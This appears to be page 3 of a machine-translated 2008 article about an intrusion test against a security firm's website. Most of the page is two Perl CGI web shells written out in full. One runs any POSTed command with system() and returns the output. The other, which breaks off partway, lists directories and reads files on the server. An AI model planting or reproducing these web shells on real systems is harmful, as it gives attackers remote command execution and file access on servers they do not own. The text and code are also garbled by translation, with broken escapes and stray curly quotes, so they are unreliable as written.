To a blue shield master station secure examination(3)

Add date: 10/08/2008 Publishing date: 10/08/2008 Hits: 1

Total 5 pages, Current page:3, Jump to page:

Actually in the entire test procedure, many are dissimilar in me from already loom's on test result and in landun.org. Is the jurisdiction establishment question. And includes CGI SHELL, what if CGI procedure mapping with is perlis.dll, CGI SHELL generally cannot use, because has not returned obviously, but after causing us not to look at the executive system order result. I on-line looked for 2-3 not to be able to use. Afterward I from began to write one, but is also quite easy to use. But this shell cannot use in landun.org. Because cmd.exe cannot move to the GUESTS group.
Below is that CGI SHELL code.
----------------------cut here---------------------
#! /usr/bin/perl
read (STDIN, $POST, $ENV {'CONTENT_LENGTH'});
($key,$command) =split(/=/,$POST);
$command=~s/%([a-fA-f0-9][a-fA-f0-9]) /pack (“C”, hex($1)) /eg;
$command=~s/\ +//;
$output=system “$command>a.txt”;
$output=~s/\ n/\ <br \ >/;
print “Content-Type: text/html \ n \ n”;
print <<EOF;
<form action= " cmd.cgi " method=POST>
<input type=text size=40 name=command value= "" ><br>
<input type=submit value=ok>
</form>
EOF
open (OUTPUT, “a.txt”)||die “cannot open $!”;
@output=<OUTPUT>;
print <<EOF;
<textarea name= " textfield " cols= " 80 " rows= " 60 " >@output</textarea>
EOF
close OUTPUT;
unlink (“a.txt”);
exit;
------------------cut here--------------------

Below is one which I afterward wrote in does not have under jurisdiction executive system cmd.exe jurisdiction simple CGI SHELL
------------------ cut here----------------------------
#! /usr/bin/perl
print “Content-Type: text/html \ n \ n”;
print <<EOF;
<html><head><title>no system function cgi shell</title></head>
EOF
if (read (STDIN, $POST, $ENV {'CONTENT_LENGTH'})) {
@pair=split(/&/,$POST);
####################### traslation code ########
foreach (@pair) {
$_=~s/\ +//g;
($name,$value) =split(/=/,$_);
$name=~s/%([a-fA-f0-9][a-fA-f0-9]) /pack (“C”, hex($1)) /eg;
$value=~s/%([a-fA-f0-9][a-fA-f0-9]) /pack (“C”, hex($1)) /eg;
$FORM{$name}=$value;
}
####################### dir command ############
if($FORM{dir} ne "") {
if($FORM{dir} =~/\ \/) {
$FORM{dir}=$FORM{dir}. “\ \”;
$FORM{dir}=~s/\ \ \ \/\ \/;}
if($FORM{dir} =~/\ //) {
$FORM{dir}=$FORM{dir}. “\/”;
$FORM{dir}=~s/\/\ // \ //;}
@dir=glob (“$FORM{dir}*”);
print <<EOF;
$FORM{dir}<br>
<textarea cols=80 rows=18>
EOF
foreach (@dir) {
$filesize= (- s $_);
if (- f $_) {
print “\ t$filesize \ t$_ \ n”;
}
if (- d $_) {
print “\ <DIR \ > \ t$filesize \ t$_ \ n”;
}
}
print <<EOF;
</textarea>
EOF
}
################# type command ################
if($FORM{type} ne "") {

Other pages: : <<Prev * 1 * 2 * 3 * 4 * 5 * Next>>

Prev:Ten big invasion examination system high risk event and handling countermeasure

Next:Invasion examination technology analysis

Comment:

Category: Home > invades the examination